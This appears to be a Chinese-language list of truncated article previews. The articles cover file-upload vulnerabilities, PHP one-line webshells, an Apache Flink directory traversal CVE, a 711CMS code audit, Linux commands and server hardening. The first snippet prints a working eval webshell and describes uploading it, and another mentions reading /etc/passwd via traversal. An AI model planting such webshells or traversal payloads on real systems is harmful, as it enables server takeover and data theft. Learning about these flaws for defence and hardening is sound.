文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create_function() array_map() array_filter() call_user_func() call_user_func_array() eval() 将字符串当作PHP代码执行,注意一定要带分号: <?php @eval($_POST['shell']);?> 将含有这个代码的PHP文件上传到服务器,命名为webshell.ph…

原先以为CentOS下的Apache应该是默认关闭目录遍历的... 然后拿自己网站试了一下发现想太多...汗 就去改下Apache的配置 首先Apache的配置文件在 /etc/httpd/conf/httpd.conf 找到这一行: 之后把Indexes改为None即可: 保存退出后重启apache,目录访问就成403啦…

1.漏洞描述 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519). Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布.数据通信以及容错机制等功能.Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历和任意文件写入漏洞,风险较大,阿里云应急响应中心提醒 Flink 用户尽快采取安全措施阻止漏洞攻击…

1. [命令]:cat [功能说明]: concatenate files and print on the standard output #连接文件并打印到标准输出,有标准输出的都可以用重定向定向导入到文件里面 [语法格式]: cat [OPTION]...[FILE]... [选项参数]: 参数 说明 简解 -b,--number-nonblank number nonempty output lines 非空输出行编号 -n,--number number all outputnline…

从今天起,咱开始正式学习python了,于是遍整理了50条linux的常用命令. 1 线上查询帮助命令 :man   遇到什么不会的命令可以 man +你想要查询的命令 (需要有网),因为是英文的所以身边最好再准备一个词典 2 目录操作命令:ls   ls命令就是list directory的缩写,缺省下ls用来打印出当前目录的清单 [语法格式]:ls -参数 [选项参数]: 参数 参数说明 其他说明 d 显示目录   a 显示全部 包括.开头的隐藏文件 l 长格式显示 每一列只显示一个文件 (…

1.ls命令 ls是list的缩写,常用命令为ls(显示出当前目录列表),ls -l(详细显示当前目录列表),ls -lh(人性化的详细显示当前目录列表),ls -a(显示出当前目录列表,包含隐藏文件) 2.cd 命令 cd是change direcory的缩写,常用命令为 cd 目录,cd ..为返回上级目录,cd - 返回上次所在目录 3.pwd命令 常用命令为pwd 显示当前所在目录 4.mkdir命令 mkdir命令为创建空目录命令,通常用法为mkdir 目录名,mkdir -p 目录名…

  0x00 环境准备 711CMS官网: https://www.711cms.com/ 网站源码版本:711CMS 1.0.5 正式版(发布时间:2018-01-20) 程序源码下载:https://www.711cms.com/versions/711cms_V1.0.5.zip 测试网站首页: 0x01 代码分析 1.漏洞文件位置:/admin/controllers/App.php  第323-393行: public function file() { $token = $this-…

目录常用命令: cd:切换目录 pwd:显示当前目录 mkdir:新建一个目录 rmdir:删除一个空的目录 ## cd 命令几种常用方法: cd ~username 切换到用户username的主文件夹,即:home/username cd ~ 切换到当前用户的主文件夹 cd 没有任何路径参数的情况下,效果同上 cd .. 切换到当前目录的上层目录 cd - 切换到刚才的目录 cd 绝对路径 | 相对路径 ## pwd 命令常用方法: root@codean:/# pwd ## mkdir 命…

手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/www/]之外的其他操作系统文件(如:/etc/passwd/).形成根源:目录权限限制不严格 #File include文件包含[1.include本地文件包含LFI:2.远程系统文件包含RFI(可传入木马)] 通常为如include函数,可以将web根目录以外的目录包含进来.根源:include…

LNMP有一个缺点就是目录权限设置上不如Apache,有时候网站程序存在上传漏洞或类似pathinfo的漏洞从而导致被上传了php木马,而给网站和服务器带来比较大危险. 建议将网站目录的PHP权限去掉,当访问上传目录下的php文件时就会返回403错误.下面VPS侦探详细介绍如何把lnmp环境下去掉指定目录的PHP执行权限. 1.单个目录去掉PHP执行权限 location ~* /attachments/.*\.(php|php5)?$ { deny all; } 2.多个目录去掉PHP执行权限…